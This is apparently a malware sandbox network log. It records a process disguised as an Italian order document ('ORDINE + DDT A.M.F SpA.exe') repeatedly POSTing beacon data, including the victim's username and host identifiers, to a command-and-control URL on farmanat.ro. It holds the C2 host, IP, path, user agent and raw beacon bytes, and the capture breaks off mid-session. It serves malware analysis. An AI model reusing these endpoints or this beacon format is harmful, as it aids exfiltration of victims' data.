Nov 25, 2021 10:50:53.177290916 CET	6757	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
319	192.168.11.20	50161	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:53.604490042 CET	6758	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:53.638037920 CET	6758	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:53.694844961 CET	6759	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.11.20	49867	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:22.464833975 CET	6349	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:22.498878956 CET	6349	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:22.549273968 CET	6349	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
320	192.168.11.20	50162	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:54.126116991 CET	6759	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:54.159674883 CET	6760	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:54.213871956 CET	6760	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
321	192.168.11.20	50163	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:54.652802944 CET	6761	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:54.686389923 CET	6761	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:54.736171007 CET	6761	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
322	192.168.11.20	50164	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:55.150613070 CET	6762	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:55.184221029 CET	6762	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:55.233901024 CET	6763	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
323	192.168.11.20	50166	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:55.643187046 CET	6769	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:55.677305937 CET	6770	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:55.729120016 CET	6770	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
324	192.168.11.20	50167	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:56.163151979 CET	6771	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:56.196743965 CET	6771	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:56.246516943 CET	6771	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
325	192.168.11.20	50168	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:56.612755060 CET	6772	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:56.646243095 CET	6772	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:56.695430040 CET	6773	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
326	192.168.11.20	50169	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:57.123615026 CET	6773	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:57.157768011 CET	6773	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:57.211141109 CET	6774	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
327	192.168.11.20	50170	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:57.646528006 CET	6775	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:57.680763960 CET	6775	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:57.730470896 CET	6775	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
328	192.168.11.20	50171	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:58.136639118 CET	6776	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:58.170049906 CET	6776	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:58.222412109 CET	6777	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
329	192.168.11.20	50172	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:58.574451923 CET	6777	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:58.607743979 CET	6777	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:58.660414934 CET	6778	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.11.20	49869	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:23.130212069 CET	6356	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:23.163805008 CET	6357	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:23.214514017 CET	6357	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
330	192.168.11.20	50173	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:59.081033945 CET	6779	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:59.114654064 CET	6779	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:59.164284945 CET	6779	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
331	192.168.11.20	50174	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:59.594203949 CET	6780	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:59.627924919 CET	6780	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:59.683665991 CET	6781	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
332	192.168.11.20	50175	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:00.115567923 CET	6781	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:00.149828911 CET	6781	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:00.202507973 CET	6782	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
333	192.168.11.20	50176	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:00.621598959 CET	6783	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:00.655038118 CET	6783	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:00.705142021 CET	6783	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
334	192.168.11.20	50177	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:01.133542061 CET	6784	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:01.167103052 CET	6784	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:01.217782021 CET	6784	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
335	192.168.11.20	50178	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:01.656410933 CET	6785	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:01.690049887 CET	6785	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:01.738830090 CET	6786	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
336	192.168.11.20	50179	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:02.166862011 CET	6787	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:02.201144934 CET	6787	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:02.254659891 CET	6787	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
337	192.168.11.20	50180	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
